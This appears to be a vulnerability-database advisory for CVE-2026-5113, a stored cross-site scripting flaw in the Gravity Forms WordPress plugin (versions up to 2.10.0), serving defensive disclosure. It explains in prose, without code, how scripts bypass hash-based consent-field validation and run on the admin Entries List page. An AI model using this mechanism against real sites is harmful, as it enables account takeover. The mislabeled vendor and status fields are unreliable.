Stored Cross-Site Scripting Vulnerability in Gravity Forms Plugin for WordPress
CVE-2026-5113

7.2HIGH

Key Information:

Vendor: WordPress
Status: Gravity Forms
Vendor: CVE Published:; 2 May 2026

What is CVE-2026-5113?

The Gravity Forms plugin for WordPress is susceptible to Stored Cross-Site Scripting (XSS) due to improper state validation in its consent field hidden inputs. In versions up to and including 2.10.0, the flawed mechanism fails to adequately verify input, allowing attackers to inject XSS payloads that remain undetected during sanitization. This occurs because the validation logic only checks if both raw and sanitized hashes match the original state. Consequently, an attacker can embed harmful scripts using tags removed by the wp_kses() function. As a result, when administrators access the Entries List page, these malicious scripts can be executed, leading to serious security implications for the site.

Affected Version(s)

Gravity Forms 0 <= 2.10.0

References

https://www.wordfence.com/threat-intel/vulnerabilities/id...

https://docs.gravityforms.com/gravityforms-change-log/

CVSS V3.1

Score:

7.2

Severity:

HIGH

Confidentiality:

Low

Integrity:

Low

Availability:

Low

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Changed

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
May 2, 2026
Vulnerability Reserved
Mar 29, 2026

Credit

tadokun

CVE-2026-5113 Data

JSON